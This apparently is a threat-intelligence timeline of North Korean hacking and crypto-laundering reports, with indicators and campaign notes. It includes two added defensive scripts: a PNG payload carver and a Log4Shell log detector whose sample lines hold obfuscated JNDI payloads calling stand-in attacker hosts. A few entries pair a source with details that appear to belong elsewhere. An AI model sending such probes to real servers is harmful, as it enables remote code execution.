Date:: 2022-04-14 URL:: https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html Tags:: CVE Details:: Indicators::

Ronin Bridge Hack Attributed to Lazarus Group, addresses added to OFAC list

Date:: 2022-04-14 URL:: https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20220414 Tags:: TraderTraitor Details:: Indicators::

  • 0x098B716B8Aaf21512996dC57EB0615e2383E2f96

Tornado Cash uses Chainalysis Oracle to block OFAC-sanctioned addresses (from the frontend)

Date:: 2022-04-15 URL:: https://x.com/TornadoCash/status/1514904975037669386 Tags:: Money Laundering Details:: Indicators::

North Korean State-Sponsored APT Targets Blockchain Companies

Date:: 2022-04-18 URL:: https://cisa.gov/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf https://cisa.gov/news-events/cybersecurity-advisories/aa22-108a Tags:: TraderTraitor Details:: Indicators::

How the DPRK became a hacking powerhouse and why it loves crypto

Date:: 2022-04-27 URL:: https://protos.com/how-the-dprk-became-a-hacking-powerhouse-and-why-it-loves-crypto/ Tags:: Money Laundering Details:: Indicators::

Guidance on the DPRK IT Workers

Date:: 2022-05-16 URL:: https://ofac.treasury.gov/media/923126/download?inline Tags:: DPRK-IT Details:: Indicators::

Insight: Crypto crash threatens North Korea's stolen funds as it ramps up weapons tests

Date:: 2022-06-29 URL:: https://reuters.com/technology/crypto-crash-threatens-north-koreas-stolen-funds-it-ramps-up-weapons-tests-2022-06-28/ Tags:: Money Laundering Details:: Indicators::

Here’s how North Korean operatives are trying to infiltrate US crypto firms

Date:: 2022-07-10 URL:: https://cnn.com/2022/07/10/politics/north-korean-hackers-crypto-currency-firms-infiltrate/index.html Tags:: DPRK-IT Details::

  • “He was a good contributor,” Devin lamented, puzzled by the man who had claimed to be Chinese and passed multiple rounds of interviews to get hired. (CNN is using a pseudonym for Devin to protect the identity of his company). Indicators::

AppleSeed Disguised as Purchase Order and Request Form Being Distributed

Date:: 2022-07-11 URL:: https://asec.ahnlab.com/en/36368/ Tags:: Details:: Indicators::

US disrupts North Korean hackers that targeted hospitals

Date:: 2022-07-19 URL:: https://apnews.com/article/technology-health-crime-lisa-monaco-government-and-politics-1c8384b8ea7a4cbe7fc1550c2f2eb110 Tags:: Details:: Indicators::

AppleSeed Being Distributed to Maintenance Company of Military Bases

Date:: 2022-07-28 URL:: https://asec.ahnlab.com/en/37078/ Tags:: Details:: Indicators::

Macro-Blocking & How Threat Actors Are Adapting

Date:: 2022-07-28 URL:: https://proofpoint.com/us/blog/threat-insight/how-threat-actors-are-adapting-post-macro-world Tags:: Details:: Indicators::

Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)

Date:: 2022-08-02 URL:: https://asec.ahnlab.com/en/37396/ Tags:: Kimsuky Details:: Indicators::

U.S. Treasury Sanctions Notorious Virtual Currency Mixer Tornado Cash

Date:: 2022-08-08 URL:: https://home.treasury.gov/news/press-releases/jy0916 Tags:: Details:: Indicators::

DTrack and Maui ransomware

Date:: 2022-08-09 URL:: https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/ Tags:: Andariel Details::

  • DTrack, Maui
  • First seen date: April 15th 2021
  • Geolocation of the target: Japan
  • 2020-12-25 Suspicious 3proxy tool
  • 2021-04-15 DTrack malware
  • 2021-04-15 Maui ransomware Indicators::

Suspected Tornado Cash developer arrested in Netherlands

Date:: 2022-08-11 URL:: https://therecord.media/suspected-tornado-cash-developer-arrested-in-netherlands Tags:: Details:: Indicators::

Trojanized Versions of PuTTY Client Application: DPRK Job Opportunity Phishing via WhatsApp

Date:: 2022-09-14 URL:: https://cloud.google.com/blog/topics/threat-intelligence/dprk-whatsapp-phishing/ https://thehackernews.com/2022/09/north-korean-hackers-spreading.html Tags:: UNC2970, UNC4034 Details:: Indicators::

Lazarus ‘Operation In(ter)ception’ Targets macOS Users Dreaming of Jobs in Crypto

Date:: 2022-09-26 URL:: https://sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/ https://finbold.com/lazarus-hackers-target-macos-users-luring-them-with-crypto-dream-job-offers/ Tags:: Details:: Indicators::

ESET: Lazarus & BYOVD: Evil To The Windows Core

Date:: 2022-09-28 URL:: https://virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf Tags:: CVE Details::

  • BYOVD, CVE-2021-21551, FUDMODULE Indicators::

Microsoft: ZINC weaponizing open-source software

Date:: 2022-09-29 URL:: https://microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/ Tags:: Diamond Sleet, UNC2970, UNC4034 Details::

  • ZINC, Diamond Sleet / UNC2970, UNC4034
  • Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads.
  • Weaponized wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks
  • Observed attempting to move laterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous organizations since June 2022.
  • The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant earlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions. Indicators::

Analysis Report on Lazarus Group's Rootkit Malware That Uses BYOVD

Date:: 2022-10-05 URL:: https://asec.ahnlab.com/wp-content/uploads/2022/10/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Oct-05-2022-3.pdf Tags:: Details:: Indicators::

U.S. targets North Korean fuel procurement network for breaching UN sanctions

Date:: 2022-10-07 URL:: https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20221007 https://home.treasury.gov/news/press-releases/jy1000 Tags:: Details:: Indicators::

North Korea's Crypto Hackers Are Paving the Road to Nuclear Armageddon

Date:: 2022-10-09 URL:: https://cnet.com/culture/features/north-koreas-crypto-hackers-are-paving-the-road-to-nuclear-armageddon/ Tags:: DPRK-IT Details::

  • The Democratic People's Republic of Korea, as North Korea is formally known, has come to depend more on crypto since the pandemic began. It historically relied on black market trade, exporting coal, meth, cigarettes and labor to Southeast Asia, Russia and especially China. But the zero COVID strategy of leader Kim Jong Un has closed borders, thinning the country's already slight revenues. Trade with China, by far North Korea's biggest economic partner, fell 80% in 2020, and reports of food shortages abound. At the same time, cryptocurrency values have skyrocketed. Indicators::

Lazarus Group Uses the DLL Side-Loading Technique (mi.dll)

Date:: 2022-10-12 URL:: https://asec.ahnlab.com/en/39828/ Tags:: Details:: Indicators::

With more than $3B already stolen, 2022 is on pace to become crypto’s ‘biggest year for hacking on record’

Date:: 2022-10-13 URL:: https://fortune.com/crypto/2022/10/13/october-record-3-billion-stolen-in-crypto-hacks-2022/ Tags:: Details:: Indicators::

Malicious app suspected to be created by a North Korean hacker organization aimed at stealing cryptocurrency discovered

Date:: 2022-10-25 URL:: https://boannews.com/media/view.asp?idx=110934 Tags:: Details:: Indicators::

Distribute AppleSeed to companies related to nuclear power plants

Date:: 2022-10-27 URL:: https://asec.ahnlab.com/ko/40552/ Tags:: Details:: Indicators::

No Pineapple! DPRK Targeting of Medical Research and Technology Sector

Date:: 2022-11-01 URL:: https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf Tags:: CVE Details::

  • Lazarus Group had been observed targeting public and private sector research organizations, medical research and energy sectors, as well as their supply chains. This campaign, dubbed No Pineapple, focused on intelligence-gathering, starting with an attack on a company that was exploited through CVE-2022-27925 (remote code execution) and CVE-2022-37042 (authentication bypass), two vulnerabilities affecting the digital collaboration Indicators::

₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware

Date:: 2022-12-01 URL:: https://volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/ Tags:: Applejeus Details::

  • Applejeus, JMT Trader, BloxHolder, OKX Fee Adjustment
  • In June 2022, the Lazarus Group registered the domain name bloxholder.com, and then configured it to host a website related to automated cryptocurrency trading. Indicators::
  • bloxholder[.]com

Lazarus group uses fake cryptocurrency apps to plant AppleJeus malware

Date:: 2022-12-05 URL:: https://malwarebytes.com/blog/news/2022/12/lazarus-group-uses-fake-cryptocurrency-apps-to-plant-applejeus-malware Tags:: Applejeus Details::

  • The campaign started when Lazarus Group registered the domain bloxholder[.]com. The website Lazarus Group built there is a clone of the legitimate website HaasOnline. HaasOnline is a Dutch company that developed HaasScript which is a crypto scripting language that allows users to create complex automated trading algorithms.
  • The cloned website distributed a Windows MSI installer that pretended to be an installer for the BloxHolder app. In fact, it was the AppleJeus malware bundled with the QTBitcoinTrader app, an open source cryptocurrency trading application which has been used by Lazarus before. Indicators::
  • strainservice[.]com
  • bloxholder[.]com
  • rebelthumb[.]net
  • wirexpro[.]com
  • oilycargo[.]com
  • telloo[.]io

Microsoft: DEV-0139 launches targeted attacks against the cryptocurrency industry

Date:: 2022-12-06 URL:: https://microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/ Tags:: Citrine Sleet, Applejeus Details::

  • AppleJeus, Citrine Sleet, OKX Fee Adjustment
  • We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
  • After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
  • A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
  • The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
  • The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
  • The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system. Indicators::
  • Telegram Group: <> OKX Fee Adjustment
  • OKX Binance & Huobi VIP fee comparision.xls
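
As an added illustration of the DEV-0139 delivery chain (not Microsoft's or the actor's code), the script below carves executables parked behind a PNG and recovers the XOR key of the encoded payload. It assumes the executables are simply appended after the IEND chunk and that the backdoor is XOR-encoded with a single-byte key; Microsoft's write-up gives neither the container layout nor the key length, so both are assumptions. The PNG and the three stand-in "executables" are constructed inline.

```python
"""Carve executables hidden behind a PNG and recover a single-byte XOR key.
Added example, not Microsoft's or the actor's code. Assumptions: the payloads
sit after the IEND chunk, and the encoded backdoor uses a one-byte XOR key.
SAMPLE_PNG is constructed for the demo."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_trailer(data):
    """Walk the chunk list and return (offset, bytes) of everything after IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4            # header + data + CRC
        if ctype == b"IEND":
            return pos, data[pos:]
    raise ValueError("IEND chunk not found")

def find_pe_candidates(blob, max_lfanew=0x400):
    """Locate PE headers at any offset under any single-byte XOR key.
    'MZ' fixes the key from the first byte; e_lfanew -> 'PE\\0\\0' confirms it,
    so plaintext executables show up with key 0 and encoded ones with their key."""
    hits = []
    for i in range(len(blob) - 0x40):
        key = blob[i] ^ 0x4D                                   # 'M'
        if blob[i + 1] ^ key != 0x5A:                          # 'Z'
            continue
        lfanew = struct.unpack("<I", bytes(b ^ key for b in blob[i + 0x3C:i + 0x40]))[0]
        if not 0x40 <= lfanew <= max_lfanew or i + lfanew + 4 > len(blob):
            continue
        if bytes(b ^ key for b in blob[i + lfanew:i + lfanew + 4]) == b"PE\0\0":
            hits.append({"offset": i, "xor_key": key})
    return hits

def xor_bytes(blob, key):
    return bytes(b ^ key for b in blob)

def analyze(png_bytes):
    """Absolute file offsets and XOR keys of every PE found behind the image."""
    start, trailer = png_trailer(png_bytes)
    return [{"offset": start + h["offset"], "xor_key": h["xor_key"]}
            for h in find_pe_candidates(trailer)]

# ---- constructed sample: 1x1 PNG, two plaintext stand-in PEs, one XOR-encoded ----
def _chunk(ctype, payload):
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload)))

def _fake_pe(tag):
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = struct.pack("<I", 0x40)     # e_lfanew: PE header right after DOS header
    return bytes(hdr) + b"PE\0\0" + tag

SAMPLE_PNG = (PNG_SIG
              + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
              + _chunk(b"IEND", b"")
              + _fake_pe(b"logagent") + _fake_pe(b"wsock32")
              + xor_bytes(_fake_pe(b"backdoor"), 0x5A))

if __name__ == "__main__":
    for hit in analyze(SAMPLE_PNG):
        print(f"PE at file offset {hit['offset']}, xor key 0x{hit['xor_key']:02x}")
```

Image viewers stop at IEND, which is why appended data survives casual inspection; carving from the IEND boundary rather than searching for raw MZ strings is what lets the scan also find the encoded copy, whose MZ signature is not visible in the bytes. A multi-byte key would need a known-plaintext approach against the DOS stub instead.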

Seoul: North Korean hackers stole $1.2B in virtual assets

Date:: 2022-12-22 URL:: https://apnews.com/article/technology-crime-business-hacking-south-korea-967763dc88e422232da54115bb13f4dc Tags:: Money Laundering Details::

  • North Korean hackers have stolen an estimated 1.5 trillion won ($1.2 billion) in cryptocurrency and other virtual assets in the past five years, more than half of it this year alone, South Korea’s spy agency said Thursday.
  • Experts and officials say North Korea has turned to crypto hacking and other illicit cyber activities as a source of badly needed foreign currency to support its fragile economy and fund its nuclear program following harsh U.N. sanctions and the COVID-19 pandemic.
  • South Korea’s main spy agency, the National Intelligence Service, said North Korea’s capacity to steal digital assets is considered among the best in the world because of the country’s focus on cybercrimes since U.N. economic sanctions were toughened in 2017 in response to its nuclear and missile tests.
  • The U.N. sanctions imposed in 2016-17 ban key North Korean exports such as coal, textiles and seafood and also led member states to repatriate North Korean overseas workers. Its economy suffered further setbacks after it imposed some of the world’s most draconian restrictions against the pandemic. Indicators::

SlowMist: Investigation of North Korean APT’s Large-Scale Phishing Attack on NFT Users

Date:: 2022-12-24 URL:: https://slowmist.medium.com/slowmist-our-in-depth-investigation-of-north-korean-apts-large-scale-phishing-attack-on-nft-users-362117600519 Tags:: Details:: Indicators::

2023

Analysis of attack activity by the suspected APT-C-26 (Lazarus) group using cryptocurrency wallet promotional material

Date:: 2023-01-11 URL:: https://mp.weixin.qq.com/s?biz=MzUyMjk4NzExMA==&mid=2247491718&idx=1&sn=71ac64eff7aa1dae857b12999ab03a4d&chksm=f9c1d38fceb65a9964858df003ac8fa8a17bf473be9de4b1e47543da3b203c0f0083f92d3e20&scene=178&cur_album_id=1915287066892959748#rd Tags:: Details::

  • Somora cryptocurrency wallet app, PowerShell Indicators::
  • droidnation[.]net/nation.php

Kimsuky North Korea’s Cryptocurrency Craze and its Impact on U.S. Policy

Date:: 2023-01-12 URL:: https://cfr.org/blog/north-koreas-cryptocurrency-craze-and-its-impact-us-policy Tags:: Kimsuky Details::

  • Kimsuky distributed document-type malware targeting security experts, which uses an external object within a Word document to execute an additional malicious macro (template Injection method). Indicators::

Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)

Date:: 2023-01-17 URL:: https://asec.ahnlab.com/en/45658/ Tags:: Details:: Indicators::

FBI: Confirms Lazarus Group Cyber Actors Responsible for Harmony's Horizon Bridge Currency Theft

Date:: 2023-01-23 URL:: https://fbi.gov/news/press-releases/fbi-confirms-lazarus-group-cyber-actors-responsible-for-harmonys-horizon-bridge-currency-theft Tags:: TraderTraitor Details:: Indicators::

2022 Biggest Year Ever For Crypto Hacking - Chainalysis

Date:: 2023-02-01 URL:: https://chainalysis.com/blog/2022-biggest-year-ever-for-crypto-hacking/ Tags:: Money Laundering Details::

  • 2022 was the biggest year ever for crypto hacking, with $3.8 billion stolen from cryptocurrency businesses. Indicators::

Proofpoint: TA444 The APT Startup Aimed at Acquisition (of Your Funds)

Date:: 2023-02-03 URL:: https://proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds Tags:: DangerousPassword, TA444, APT38 Details::

  • In the world of tech startups, luminaries and charlatans alike boast of the value of rapid iteration, testing products on the fly, and failing forward. TA444, a North Korea-sponsored advanced persistent threat group, has taken these mantras to heart. TA444, which overlaps with public activity called APT38, Bluenoroff, BlackAlicanto, Stardust Chollima, and COPERNICIUM, is likely tasked with generating revenue for the North Korean regime. That tasking has historically involved the targeting of banks to ultimately funnel cash to the Hermit Kingdom or handlers abroad. More recently, TA444 has turned its attention, much like the tech industry, to cryptocurrency. While we do not know if the group has ping pong tables or kegs of some overrated IPA in its workspace, TA444 does mirror the startup culture in its devotion to the dollar and to the grind.
  • Back in its infant interest with blockchain and cryptocurrency, TA444 had two main avenues of initial access: an LNK-oriented delivery chain and a chain beginning with documents using remote templates. These campaigns were typically referred to as DangerousPassword, CryptoCore, or SnatchCrypto.
  • In 2022, TA444 continued to use both methods, but had also tried its hand at other file types for initial access. Despite having not heavily relied on macros in previous campaigns, TA444 seemed to mirror the cybercrime landscape in the summer and fall, attempting to find additional file types to stuff its payloads into. Indicators::

CISA: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

Date:: 2023-02-09 URL:: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a Tags:: Details::

  • The TTPs associated with DPRK ransomware attacks include those traditionally observed in ransomware operations. Additionally, these TTPs span phases from acquiring and purchasing infrastructure to concealing DPRK affiliation:
  • Acquire Infrastructure [T1583]. DPRK actors generate domains, personas, and accounts; and identify cryptocurrency services to conduct their ransomware operations. Actors procure infrastructure, IP addresses, and domains with cryptocurrency generated through illicit cybercrime, such as ransomware and cryptocurrency theft.
  • Obfuscate Identity. DPRK actors purposely obfuscate their involvement by operating with or under third-party foreign affiliate identities and use third-party foreign intermediaries to receive ransom payments.
  • Purchase VPNs and VPSs [T1583.003]. DPRK cyber actors will also use virtual private networks (VPNs) and virtual private servers (VPSs) or third-country IP addresses to appear to be from innocuous locations instead of from DPRK.
  • Gain Access [TA0001]. Actors exploit publicly known CVEs to gain access to and escalate privileges on networks. Recently observed CVEs used for access include remote code execution in the Apache Log4j library (Log4Shell) and remote code execution in unpatched SonicWall SMA 100 appliances [T1190 and T1133]. Observed CVEs include:
  • CVE-2021-44228
  • CVE-2021-20038
  • CVE-2022-24990
  • Actors also likely spread malicious code through Trojanized files for “X-Popup,” an open source messenger commonly used by employees of small and medium hospitals in South Korea [T1195].
  • The actors spread malware by leveraging two domains: xpopup.pe[.]kr and xpopup[.]com. xpopup.pe[.]kr is registered to IP address 115.68.95[.]128 and xpopup[.]com to 119.205.197[.]111. Related file names and hashes are listed in table 1 of the advisory. Indicators::
  • 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk
  • 16ENLdHbnmDcEV8iqN4vuyZHa7sSdYRh76
  • 16sYqXancDDiijcuruZecCkdBDwDf4vSEC
  • 1FX4W9rrG4F3Uc7gJ18GCwGab8XuW8Ajy2
  • 1J8spy62o7z2AjQxoUpiCGnBh5cRWKVWJC
  • 1KCwfCUgnSy3pzNX7U1i5NwFzRtth4bRBc
  • 1KmWW6LgdgykBBrSXrFu9kdoHz95Fe9kQF
  • 1MTHBCrBKYEthfa16zo9kabt4f9jMJz8Rm
  • 1N6JphHFaYmYaokS5xH31Z67bvk4ykd9CP
  • 1NqihEqYaQaWiZkPVdSMiTbt7dTy1LMxgX
  • bc1q3wzxvu8yhs8h7mlkmf7277wyklkah9k4sm9anu
  • bc1q498fn0gauj2kkjsg35mlwk2cnxhaqlj7hkh8xy
  • bc1q6024d73h48fnhwswhwt3hqz2lzw6x99q0nulm4
  • bc1q6qfkt06xmrpclht3acmq00p7zyy0ejydu89zwv
  • bc1q7qry3lsrphmnw3exs7tkwzpvzjcxs942aq8n0y
  • bc1q80vc4yjgg6umedkut3e9mhehxl4q4dcjjyzh59
  • bc1q8t69gpxsezdcr8w6tfzp3jeptq4tcp2g9d0mwy
  • bc1q8xyt4jxhw7mgqpwd6qfdjyxgvjeuz57jxrvgk9
  • bc1q9h7yj79sqm4t536q0fdn7n4y2atsvvl22m28ep
  • bc1qagaayd57vr25dlqgk7f00nhz9qepqgnlnt4upu
  • bc1qavrtge4p7dmcrnvhlvuhaarx8rek76wxyk7dgg
  • bc1qcmlcxfsy0zlqhh72jvvc4rh7hvwhx6scp27na0
  • bc1qcp557vltuu3qc6pk3ld0ayagrxuf2thp3pjzpe
  • bc1qcywkd7zqlwmjy36c46dpf8cq6ts6wgkjx0u7cn
  • bc1qg3zlxxhhcvt6hkuhmqml8y9pas76cajcu9ltdl
  • bc1qhfmqstxp3yp9muvuz29wk77vjtdyrkff4nrxpu
  • bc1qj6y72rk039mqpgtcy7mwjd3eum6cx6027ndgmd
  • bc1qk0saaw7p0wrwla6u7tfjlxrutlgrwnudzx9tyw
  • bc1ql8wsflrjf9zlusauynzjm83mupq6c9jz9vnqxg
  • bc1qlqgu2l2kms5338zuc95kxavctzyy0v705tpvyc
  • bc1qmge6a7sp659exnx78zhm9zgrw88n6un0rl9trs
  • bc1qn7a3g23nzpuytchyyteyhkcse84cnylznl3j32
  • bc1qnh8scrvuqvlzmzgw7eesyrmtes9c5m78duetf3
  • bc1qnz4udqkumjghnm2a3zt0w3ep8fwdcyv3krr3jq
  • bc1qu0pvfmtxawm8s99lcjvxapungtsmkvwyvak6cs
  • bc1qunqnjdlvqkjuhtclfp8kzkjpvdz9qnk898xczp
  • bc1quvnaxnpqlzq3mdhfddh35j7e7ufxh3gpc56hca
  • bc1qwdvexlyvg3mqvqw7g6l09qup0qew80wjj9jh7x
  • bc1qx60ec3nfd5yhsyyxkzkpts54w970yxj84zrdck
  • bc1qxrpevck3pq1yzrx2pq2rkvkvy0jnm56nzjv6pw
  • bc1qy6su7vrh7ts5ng2628escmhr98msmzg62ez2sp
  • bc1qyue2pgjk09ps7qvfs559k8kee3jkcw4p4vdp57
  • LZ1VNJfn6mWjPzkCyoBvqWaBZYXAwn135
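
Log4Shell probes of the kind the advisory lists under initial access are easy to miss when the attacker nests Log4j lookups or URL-encodes the string. The detector below is an added example, not part of the CISA advisory: it undoes the encoding and the lookup nesting that CVE-2021-44228 exploitation abuses, then extracts the callback protocol and host, and it keeps a naive matcher alongside to show what a plain `${jndi:` search misses. The log lines and the addresses in them are constructed.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in web logs, including the nested
lookups and URL encoding used to evade a plain '${jndi:' match.
Added example; not part of the CISA advisory. SAMPLE_LOG is constructed."""
import re
from urllib.parse import unquote

_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/}\s:]+)")

def _resolve(m):
    """Collapse one innermost lookup the way Log4j 2 would, leaving jndi: alone."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                 # the payload itself: keep for matching
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${::-j}, ${env:NOPE:-j}: default-value syntax
        return body.split(":-", 1)[1]
    return m.group(0)

def normalize(s, rounds=10):
    """Undo URL encoding and nested lookups until the string stops changing."""
    for _ in range(rounds):
        new = _INNERMOST.sub(_resolve, unquote(s))
        if new == s:
            break
        s = new
    return s.lower()

def naive_scan(lines):
    """What a literal substring match catches: only the unobfuscated probe."""
    return [ln.split()[0] for ln in lines if "${jndi:" in ln]

def scan_log(lines):
    """Return client IP, protocol and callback host for each normalized hit."""
    hits = []
    for ln in lines:
        m = _JNDI.search(normalize(ln))
        if m:
            hits.append({"src": ln.split()[0], "proto": m.group(1), "host": m.group(2)})
    return hits

# Constructed access-log lines: plain probe, benign request, URL-encoded probe
# with ${::-j} nesting, and a lower/upper-nested probe in the User-Agent.
SAMPLE_LOG = r'''10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "POST /login HTTP/1.1" 200 10 "-" "${${lower:j}${upper:n}${lower:d}i:${lower:rmi}://203.0.113.9/obj}"'''

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("naive:", naive_scan(lines))
    print("normalized:", scan_log(lines))
```

The callback host is the useful output: a probe that lands on a vulnerable Log4j will make an outbound LDAP/RMI/DNS request to it, so the same value can be matched against egress logs to tell scanning from successful exploitation. Other lookup tricks (for example `${date:...}` abuse) are not resolved here and would need their own rule in `_resolve`.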

Malware Disguised as Normal Documents

Date:: 2023-02-15 URL:: https://asec.ahnlab.com/en/47585/ Tags:: Kimsuky Details::

  • Same tactics as in "Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)"; in this case, the threat actor used an image that prompts users to execute the macro. Indicators::

Økokrim has seized almost NOK 60 million in cryptocurrency. This is the largest amount of cryptocurrency ever seized by the Norwegian police

Date:: 2023-02-16 URL:: https://okokrim.no/record-cryptocurrency-seizure-in-the-axie-case.6585495-549344.html Tags:: TraderTraitor, Money Laundering Details:: Indicators::

Lazarus Anti-Forensic Techniques

Date:: 2023-02-23 URL:: https://asec.ahnlab.com/en/48223/ Tags:: Details::

  • The Lazarus Group used anti-forensic techniques to conceal its activity: the configuration file holding C2 information and the PE file that talks to the C2 server were both delivered in encrypted form to evade security products. A loader decrypts them directly into memory, and only then do the decrypted components fetch additional files from the C2 and carry out the malicious actions. Indicators::

WinorDLL64 backdoor from the vast Lazarus arsenal

Date:: 2023-02-24 URL:: https://welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/ Tags:: Details::

  • The WinorDLL64 payload serves as a backdoor that most notably acquires extensive system information, provides means for file manipulation, such as exfiltrating, overwriting, and removing files, and executes additional commands. Interestingly, it communicates over a connection that was already established by the Wslink loader.
  • In 2021, we did not find any data that would suggest Wslink is a tool from a known threat actor. However, after an extensive analysis of the payload, we have attributed WinorDLL64 to the Lazarus APT group with low confidence based on the targeted region and an overlap in both behavior and code with known Lazarus samples. Indicators::

Mandiant: Stealing the LIGHTSHOW (Part One: UNC2970; Part Two: LIGHTSHIFT and LIGHTSHOW)

Date:: 2023-03-09 URL:: https://cloud.google.com/blog/topics/threat-intelligence/lightshow-north-korea-unc2970 https://cloud.google.com/blog/topics/threat-intelligence/lightshift-and-lightshow/ Tags:: UNC2970, UNC4034 Details::

  • Bring Your Own Vulnerable Driver (BYOVD) Indicators::

CHM Malware Disguised as North Korea-related Questionnaire

Date:: 2023-03-13 URL:: https://asec.ahnlab.com/en/49295/ Tags:: Kimsuky Details::

  • The CHM file has been compressed and is being distributed as an email attachment. The first email that is sent pretends to be an interview request about matters related to North Korea. If the email recipient accepts the interview, then a password-protected compressed file is sent as an attachment. Not only is this email pretending to be a North Korea-related interview identical to the one previously analyzed, but it also follows the same format of sending the malicious file only when a recipient replies to the email. Indicators::

OneNote Malware Disguised as Compensation Form

Date:: 2023-03-24 URL:: https://asec.ahnlab.com/en/50303/ Tags:: Kimsuky Details:: Indicators::

Distributes Malware Disguised as Profile Template (GitHub)

Date:: 2023-03-29 URL:: https://asec.ahnlab.com/en/50621/ Tags:: Kimsuky Details:: Indicators::

Not just an infostealer: Gopuram backdoor deployed through 3CX supply chain attack

Date:: 2023-04-03 URL:: https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/ Tags:: Applejeus, Gopuram, 3CX Details::

  • As we reviewed available reports on the 3CX attack, we began wondering if the compromise concluded with the infostealer or further implants followed. To answer that question, we decided to review the telemetry we had on the campaign. On one of the machines, we observed a DLL named guard64.dll, which was loaded into the infected 3CXDesktopApp.exe process. Interestingly enough, we opened an investigation into a case linked to that DLL on March 21, about a week before the supply chain attack was discovered. A DLL with that name was used in recent deployments of a backdoor that we dubbed Gopuram and had been tracking internally since 2020. Three years ago, we were investigating an infection of a cryptocurrency company located in Southeast Asia. During the investigation, we found that Gopuram coexisted on victim machines with AppleJeus, a backdoor attributed to the Korean-speaking threat actor Lazarus.
  • Over the years, we observed few victims compromised with Gopuram, but the number of infections began to increase in March 2023. As it turned out, the increase was directly related to the 3CX supply chain attack. We found out that the threat actor specifically targeted cryptocurrency companies, dropping the following files on infected machines:
